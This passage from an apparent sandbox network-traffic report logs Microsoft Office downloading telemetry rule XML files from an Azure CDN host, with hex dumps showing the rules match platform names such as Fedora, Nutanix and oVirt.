6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49785	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:04 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:04 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:04 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174604Z-16547b76f7f76p6chC1DFWctqw00000005gg00000000ps7d x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:04 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:04 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:04 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:04 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 1511aab4-801e-0015-535c-2ef97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174604Z-15869dbbcc6tjwwhhC1DFWt1ns00000005d000000000gnay x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:04 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:05 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:05 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:05 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: a6b44ea6-e01e-001f-1d33-2f1633000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174605Z-15869dbbcc6lq2lzhC1DFWym6c00000000g0000000004wtd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:05 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:05 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:05 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:05 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 0cf77bbd-b01e-005c-1be1-2e4c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174605Z-17df447cdb5fzdpxhC1DFWdd3400000001r00000000006wd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:05 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:05 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:05 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:05 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 4767900e-701e-003e-7b03-2f79b3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174605Z-17df447cdb56mx55hC1DFWvy5w00000001m0000000005tre x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:05 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:05 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:05 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:05 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174605Z-16547b76f7fxsvjdhC1DFWprrs00000005cg00000000d9fc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:05 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:05 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:05 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:05 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174605Z-16547b76f7f7rtshhC1DFWrtqn00000005f000000000mpu5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:05 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:06 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174606Z-16547b76f7fj5p7mhC1DFWf8w400000005mg000000009vxs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:06 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:06 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 4c090a89-b01e-0098-3360-2ecead000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174606Z-15869dbbcc6zbpm7hC1DFWrx5s00000001z000000000wf6t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:06 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:06 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 84934087-701e-0021-808e-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174606Z-15869dbbcc6vr5dxhC1DFWyqks00000005h000000000ftb8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:06 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:06 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174606Z-16547b76f7fxdzxghC1DFWmf7n00000005m000000000br5g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:06 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:06 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174606Z-16547b76f7fj5p7mhC1DFWf8w400000005g000000000syzu x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
